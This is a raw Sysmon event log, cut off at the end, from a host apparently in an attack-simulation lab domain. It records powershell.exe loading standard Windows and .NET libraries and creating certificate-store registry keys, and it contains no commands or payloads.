12241200x800000000000000057347655Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347654Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347653Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347652Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057347651Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0fbbab68671be0c0f3a6297e7ca803d\System.Management.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Management.dllMD5=DBB27AB7CAB61053088108EADD3FF3A1,SHA256=703DD09A5B05E85DAC24B667BC3245FBD5E5656E5310E2C12D07854509D5B197false-Unavailable 12241200x800000000000000057347650Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347648Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347647Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347646Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347645Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347642Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347641Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347640Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347639Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347638Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347637Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347636Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347635Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347634Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs 12241200x800000000000000057347633Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs 12241200x800000000000000057347632Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates 12241200x800000000000000057347631Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x800000000000000057347630Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x800000000000000057347629Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057347628Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057347627Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057347626Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 12241200x800000000000000057347625Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057347624Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 734700x800000000000000057347623Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\e1c9eb2e855d26a67dbf39e6236430de\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=695EB4BE24FC9DB279F2427D31AD35D4,SHA256=014EDA5BD7025A6F01BEA1F6E05663FE4BCE64FA95B7378EBF9C827991B32E64false-Unavailable 12241200x800000000000000057347622Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057347621Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057347620Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057347619Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057347618Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057347617Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057347616Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 12241200x800000000000000057347615Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057347614Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057347613Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057347612Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA 12241200x800000000000000057347611Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\CA 734700x800000000000000057347610Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\3aa672cbe292d5ddf9584d1f7db9d670\Microsoft.Management.Infrastructure.ni.dll10.0.14393.4046csMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.Management.Infrastructure.dllMD5=59875203392777585BF3BEDA3FDE5F58,SHA256=0B34C92AD9369E83E93B027F1C29ACA599E3374355D514B5463DC21A7414C7EEfalse-Unavailable 734700x800000000000000057347609Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000057347608Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000057347607Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wintrust.dll10.0.14393.4530 (rs1_release.210705-0736)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=992BCD32EF7680C574A426FAA4933ACA,SHA256=5755AC46B4220784A6E6AC12A755CC10892A5AE59B67924576075A1A29D68B3DtrueMicrosoft WindowsValid 734700x800000000000000057347606Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValid 734700x800000000000000057347605Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057347604Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057347603Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057347602Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 734700x800000000000000057347601Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057347600Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 10341000x800000000000000057347599Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-886D-6164-0C00-00000000F101}8489544C:\Windows\system32\svchost.exe{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057347598Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 734700x800000000000000057347597Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll10.0.14393.4583System.Management.AutomationMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationSystem.Management.Automation.dllMD5=AD8389BA939281CED11F6F269CA54BF8,SHA256=6091BCDB4AE15E026EE5E4C39D32553DE70C502F8735EC5144FBC88990BA2FACfalse-Unavailable 734700x800000000000000057347596Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057347595Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057347594Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.407{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057347593Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057347592Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\eda6c4a8c148f7e83fb160d7019294f2\Microsoft.PowerShell.ConsoleHost.ni.dll10.0.14393.3866Microsoft.PowerShell.ConsoleHostMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.PowerShell.ConsoleHost.dllMD5=BFE1CC91C2632CC5FAD1ED362D20C613,SHA256=14A306207F0270D0B0CF96794C97ECACCD2E9CA46CCDE64EA031A1F0CA3A0E9Afalse-Unavailable 734700x800000000000000057347591Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\625a7ccd665c33cee4988e3cd136b902\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=27741782AAECFE54A201896D93BA1C9A,SHA256=7389517EE682897300DE398245D2C3EE37E5060CF6320138430A8AA86E6E737Bfalse-Unavailable 734700x800000000000000057347590Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.391{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057347589Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 